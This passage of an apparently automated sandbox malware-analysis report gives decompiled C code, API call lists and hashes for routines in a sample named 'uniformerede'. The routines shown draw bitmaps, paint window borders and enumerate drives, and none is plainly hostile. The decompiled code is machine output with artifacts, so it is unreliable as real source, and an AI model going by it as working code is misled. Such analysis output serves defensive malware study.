                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,000000FF), ref: 00429C4E
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,000000FF), ref: 00429C5D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,0000000C), ref: 00429C6F
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00429C7E
                                                                                                                                                                                                                            • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00429CB1
                                                                                                                                                                                                                            • SetStretchBltMode.GDI32(?,00000004), ref: 00429CBF
                                                                                                                                                                                                                            • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00429CD7
                                                                                                                                                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 00429CF4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00429DDD,?,?,0000000E,00000000,?,0000000C), ref: 00429D54
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00429D69
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00429DC8
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00429DD7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BrushModeObjectSelectStretch$A590B150B380B410CreateDeleteHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2051775979-0
                                                                                                                                                                                                                            • Opcode ID: 9ae8ba71a01b6d7c1173655bff0cb7420e27a894bb0d9d798ee7fbb1f021728a
                                                                                                                                                                                                                            • Instruction ID: 4bdc1ec2b254633c36354ca88bbdad4dffc819a4d2a14069678e4514baf45347
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ae8ba71a01b6d7c1173655bff0cb7420e27a894bb0d9d798ee7fbb1f021728a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4714675B04205AFDB40DFA9D985F5EBBF8AF08304F5585AAB508E7391C638ED00CB68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00426070(struct HDC__* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				int _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				int _v24;
                                                                                                                                                                                                                            				struct HDC__* _v28;
                                                                                                                                                                                                                            				struct HDC__* _v32;
                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                            				void _v56;
                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				int _t43;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				void* _t72;
                                                                                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t87 = _t88;
                                                                                                                                                                                                                            				_t89 = _t88 + 0xffffffcc;
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				asm("movsd");
                                                                                                                                                                                                                            				_t71 = __ecx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v28 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L004072E0();
                                                                                                                                                                                                                            				_v32 = __eax;
                                                                                                                                                                                                                            				_push(_t87);
                                                                                                                                                                                                                            				_push(0x4261be);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t89;
                                                                                                                                                                                                                            				_t37 = GetObjectA(_v8, 0x18,  &_v56);
                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v24 = _t37;
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						E00425FB8(__ecx);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t87);
                                                                                                                                                                                                                            					_push(0x42612d);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t89;
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_t41 = _v24;
                                                                                                                                                                                                                            					_push(_t41);
                                                                                                                                                                                                                            					L004072D8();
                                                                                                                                                                                                                            					_v20 = _t41;
                                                                                                                                                                                                                            					if(_v20 == 0) {
                                                                                                                                                                                                                            						E00425FB8(_t71);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t79);
                                                                                                                                                                                                                            					 *[fs:eax] = _t79;
                                                                                                                                                                                                                            					_push(0x426134);
                                                                                                                                                                                                                            					_t43 = _v24;
                                                                                                                                                                                                                            					_push(_t43);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t43;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(1);
                                                                                                                                                                                                                            					_push(_v12);
                                                                                                                                                                                                                            					_t47 = _v16;
                                                                                                                                                                                                                            					_push(_t47);
                                                                                                                                                                                                                            					L004072C8();
                                                                                                                                                                                                                            					_v20 = _t47;
                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                            						_t72 = SelectObject(_v28, _v8);
                                                                                                                                                                                                                            						_t85 = SelectObject(_v32, _v20);
                                                                                                                                                                                                                            						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                                                                                                                                                                                            						if(_t72 != 0) {
                                                                                                                                                                                                                            							SelectObject(_v28, _t72);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_t85 != 0) {
                                                                                                                                                                                                                            							SelectObject(_v32, _t85);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t80);
                                                                                                                                                                                                                            					 *[fs:eax] = _t80;
                                                                                                                                                                                                                            					_push(0x4261c5);
                                                                                                                                                                                                                            					DeleteDC(_v28);
                                                                                                                                                                                                                            					return DeleteDC(_v32);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426087
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000), ref: 00426091
                                                                                                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                                                                                                                                                                                            • 73C9A410.GDI32(?,?,00000001,00000001,00000000,00000000,004261BE,?,00000000,00000000), ref: 004260C8
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,00000000,004261BE,?,00000000,00000000), ref: 004260D4
                                                                                                                                                                                                                            • 73C9A520.GDI32(00000000,?,?,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426101
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426134,00000000,0042612D,?,00000000,00000000,004261BE,?,00000000,00000000), ref: 00426127
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00426142
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426151
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00426199
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261AF
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 004261B8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 956127455-0
                                                                                                                                                                                                                            • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                                                                                                                                                                                            • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				void* _v64;
                                                                                                                                                                                                                            				struct HDC__* _t120;
                                                                                                                                                                                                                            				void* _t171;
                                                                                                                                                                                                                            				intOrPtr* _t193;
                                                                                                                                                                                                                            				intOrPtr* _t196;
                                                                                                                                                                                                                            				intOrPtr _t205;
                                                                                                                                                                                                                            				void* _t208;
                                                                                                                                                                                                                            				intOrPtr _t216;
                                                                                                                                                                                                                            				signed int _t234;
                                                                                                                                                                                                                            				void* _t237;
                                                                                                                                                                                                                            				void* _t239;
                                                                                                                                                                                                                            				intOrPtr _t240;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t237 = _t239;
                                                                                                                                                                                                                            				_t240 = _t239 + 0xffffffc4;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                                                                                                                                                                                            					_t120 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t120);
                                                                                                                                                                                                                            					L00407730();
                                                                                                                                                                                                                            					_v16 = _t120;
                                                                                                                                                                                                                            					_push(_t237);
                                                                                                                                                                                                                            					_push(0x44275e);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t240;
                                                                                                                                                                                                                            					GetClientRect(E00441704(_v8),  &_v32);
                                                                                                                                                                                                                            					GetWindowRect(E00441704(_v8),  &_v48);
                                                                                                                                                                                                                            					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
                                                                                                                                                                                                                            					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                                                                                                                                                                                            					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					if( *(_v8 + 0x165) != 0) {
                                                                                                                                                                                                                            						_t208 = 0;
                                                                                                                                                                                                                            						if( *(_v8 + 0x163) != 0) {
                                                                                                                                                                                                                            							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(_v8 + 0x164) != 0) {
                                                                                                                                                                                                                            							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t234 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                                                                                                                                                                                            							_v48.left = _v48.left - _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                                                                                                                                                                                            							_v48.top = _v48.top - _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                                                                                                                                                                                            							_v48.right = _v48.right + _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if((_t234 & 0x00200000) != 0) {
                                                                                                                                                                                                                            							_t196 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                                                                                                                                                                                            							_v48.bottom = _v48.bottom + _t208;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if((_t234 & 0x00100000) != 0) {
                                                                                                                                                                                                                            							_t193 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                                                                                                                                                                                            					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                                                                                                                                                                                            					_pop(_t216);
                                                                                                                                                                                                                            					 *[fs:eax] = _t216;
                                                                                                                                                                                                                            					_push(0x442765);
                                                                                                                                                                                                                            					_push(_v16);
                                                                                                                                                                                                                            					_t171 = E00441704(_v8);
                                                                                                                                                                                                                            					_push(_t171);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t171;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_v8 - 0x10))();
                                                                                                                                                                                                                            					_t205 = E004329D8(E004328F8());
                                                                                                                                                                                                                            					if(_t205 != 0) {
                                                                                                                                                                                                                            						_t205 = _v8;
                                                                                                                                                                                                                            						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
                                                                                                                                                                                                                            							_t205 = E00432F08(E004328F8(), 0, _v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t205;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9B080.USER32(00000000), ref: 0044252C
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 0044254F
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00442561
                                                                                                                                                                                                                            • MapWindowPoints.USER32 ref: 00442577
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                                                                                                                                                                                            • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 00442619
                                                                                                                                                                                                                            • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                                                                                                                                                                                            • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                                                                                                                                                                                            • FillRect.USER32 ref: 00442739
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00442765,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00442758
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 156109915-0
                                                                                                                                                                                                                            • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                                                                                                                                                                                            • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E00473F50(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                            				intOrPtr _t107;
                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                            				signed int _t123;
                                                                                                                                                                                                                            				intOrPtr* _t126;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t121 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t126);
                                                                                                                                                                                                                            				_push(0x47418f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t126;
                                                                                                                                                                                                                            				_t123 = GetLogicalDrives();
                                                                                                                                                                                                                            				_t90 = 0x41;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					if((0x00000001 << 0xffffffffffffffbf & _t123) != 0) {
                                                                                                                                                                                                                            						if(_t121 != 0xffffffff) {
                                                                                                                                                                                                                            							E00404BA8();
                                                                                                                                                                                                                            							E00404C88( &_v24, 0x4741a8);
                                                                                                                                                                                                                            							_t58 = GetDriveTypeA(E00404E80(_v24));
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(_t58);
                                                                                                                                                                                                                            							_t59 = _t121;
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							__eflags = 0 - _v56;
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								__eflags = _t59 -  *_t126;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								E00404BA8();
                                                                                                                                                                                                                            								E00404CCC( &_v12, 0x4741a8, _v28);
                                                                                                                                                                                                                            								_t67 = GetDriveTypeA(E00404E80(_v12));
                                                                                                                                                                                                                            								__eflags = _t67 - 6;
                                                                                                                                                                                                                            								if(_t67 > 6) {
                                                                                                                                                                                                                            									L24:
                                                                                                                                                                                                                            									E00404A58( &_v16, "Unknown");
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									switch( *((intOrPtr*)(_t67 * 4 +  &M004740DC))) {
                                                                                                                                                                                                                            										case 0:
                                                                                                                                                                                                                            											goto L24;
                                                                                                                                                                                                                            										case 1:
                                                                                                                                                                                                                            											E00404A58( &_v16, "Invalid root path");
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            										case 2:
                                                                                                                                                                                                                            											__eax =  &_v16;
                                                                                                                                                                                                                            											__edx = "Removable";
                                                                                                                                                                                                                            											__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            										case 3:
                                                                                                                                                                                                                            											__eax =  &_v16;
                                                                                                                                                                                                                            											__edx = 0x4741e4;
                                                                                                                                                                                                                            											__eax = E00404A58( &_v16, 0x4741e4);
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            										case 4:
                                                                                                                                                                                                                            											__eax =  &_v16;
                                                                                                                                                                                                                            											__edx = "Remote (network)";
                                                                                                                                                                                                                            											__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            										case 5:
                                                                                                                                                                                                                            											__eax =  &_v16;
                                                                                                                                                                                                                            											__edx = "CD-ROM";
                                                                                                                                                                                                                            											__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            										case 6:
                                                                                                                                                                                                                            											__eax =  &_v16;
                                                                                                                                                                                                                            											__edx = "RAM disk";
                                                                                                                                                                                                                            											__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            											goto L25;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L25:
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00404BA8();
                                                                                                                                                                                                                            							E00404CCC( &_v12, 0x4741a8, _v20);
                                                                                                                                                                                                                            							_t80 = GetDriveTypeA(E00404E80(_v12));
                                                                                                                                                                                                                            							if(_t80 > 6) {
                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                            								E00404A58( &_v16, "Unknown");
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								switch( *((intOrPtr*)(_t80 * 4 +  &M00473FCD))) {
                                                                                                                                                                                                                            									case 0:
                                                                                                                                                                                                                            										goto L11;
                                                                                                                                                                                                                            									case 1:
                                                                                                                                                                                                                            										E00404A58( &_v16, "Invalid root path");
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            									case 2:
                                                                                                                                                                                                                            										__eax =  &_v16;
                                                                                                                                                                                                                            										__edx = "Removable";
                                                                                                                                                                                                                            										__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            									case 3:
                                                                                                                                                                                                                            										__eax =  &_v16;
                                                                                                                                                                                                                            										__edx = 0x4741e4;
                                                                                                                                                                                                                            										__eax = E00404A58( &_v16, 0x4741e4);
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            									case 4:
                                                                                                                                                                                                                            										__eax =  &_v16;
                                                                                                                                                                                                                            										__edx = "Remote (network)";
                                                                                                                                                                                                                            										__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            									case 5:
                                                                                                                                                                                                                            										__eax =  &_v16;
                                                                                                                                                                                                                            										__edx = "CD-ROM";
                                                                                                                                                                                                                            										__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            									case 6:
                                                                                                                                                                                                                            										__eax =  &_v16;
                                                                                                                                                                                                                            										__edx = "RAM disk";
                                                                                                                                                                                                                            										__eax = E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x38))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t90 = _t90 + 1;
                                                                                                                                                                                                                            				} while (_t90 != 0x5b);
                                                                                                                                                                                                                            				_pop(_t107);
                                                                                                                                                                                                                            				 *[fs:eax] = _t107;
                                                                                                                                                                                                                            				_push(0x474196);
                                                                                                                                                                                                                            				return E004049E4( &_v28, 5);
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00473F71
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00473FBC
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0047408B
                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,00000000,0047418F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004740CB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DriveType$DrivesLogical
